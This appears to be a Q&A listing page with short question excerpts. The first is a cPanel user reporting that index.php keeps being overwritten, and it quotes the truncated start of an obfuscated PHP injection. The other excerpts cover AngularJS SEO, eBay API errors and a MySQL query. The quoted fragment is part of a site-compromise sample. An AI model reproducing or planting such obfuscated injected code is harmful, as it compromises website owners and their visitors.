skip to Main Content

In Cpanel under pubilc_html index.php is getting created automatically

In my CPanel under public_html (website root) index.php is overwriting any index.php file with this following code (;_;) <?php $z1OYQeXkoA='*3wO*bE*3w/*aY*3w,#*3wO*bE*3w/*aY*3w#,*2wT*aI*1wP*bR,#*2wT*aI*1wP*bR#,*1wn*bm*2wn*aR*1w,#*1wn*bm*2wn*aR*1w#,*4wO*bp*1wm*aM*3w,#*4wO*bp*1wm*aM*3w#,*1wX*bq*5wY*aU,#*1wX*bq*5wY*aU#,*4ww*aL*5wL*bV*2w,#*4ww*aL*5wL*bV*2w#,*1wh*bT*4wI*aa,#*1wh*bT*4wI*aa#,*4wM*ba*4wt*ai*4w,#*4wM*ba*4wt*ai*4w#,*4wA*btD*aO*2w,#*4wA*btD*aO*2w#,L*aA*3wQ*bo*2w,#L*aA*3wQ*bo*2w#,*4wV*bAC*a/*2w,#*4wV*bAC*a/*2w#,*4wy*bx*1wo*ak*4w,#*4wy*bx*1wo*ak*4w#,*2ws*aj*5wa*bY*3w,#*2ws*aj*5wa*bY*3w#,*4wj*aN*1wr*bO*4w,#*4wj*aN*1wr*bO*4w#,*5wz*awH*bF*4w,#*5wz*awH*bF*4w#,K*bC*4wa*as,#K*bC*4wa*as#,*2wN*al*4wU*bz*2w,#*2wN*al*4wU*bz*2w#,*3wq*bL*4wJ*aF*1w,#*3wq*bL*4wJ*aF*1w#,*3wp*af*4wj*bu*2w,#*3wp*af*4wj*bu*2w#,*5wF*bZ*1wq*aD,#*5wF*bZ*1wq*aD#,*1wo*bw*4 --like this(*code is too long)

VIEW QUESTION

angular.js how to tell google to index my site? – SEO

I've an angular.js app. I have followed google's guide for ajax based applications. I've done this: meta tags <base href="/"> <meta name="fragment" content="!"> angular.js config $locationProvider.html5Mode(true); $locationProvider.hashPrefix('!'); my html links looks like this(is it wrong?): <a ng-href="/#!/login">Login</a> I submitted sitemap…

VIEW QUESTION

ebay apis php error undefined index

I'm implementing a vary simple search engine to ebay items using eBay APIs for a university project. I have a simple index.php file containing a search box : <form action="MySample1.php" method="POST"> <input type="text" name="query" size="90" maxlength="255" /> <input type="submit" value="Cerca"…

VIEW QUESTION

MySQL explain shows that main table's indexes are not used at production server – Oscommerce

I am trying to optimize the following modified MySQL query from OsCommerce: select distinct p.products_id, pd.products_name, m.manufacturers_name, s.specials_new_products_price from products p inner join products_description pd on p.products_id = pd.products_id inner join products_to_categories p2c on p.products_id = p2c.products_id left join manufacturers…

VIEW QUESTION
Back To Top
Search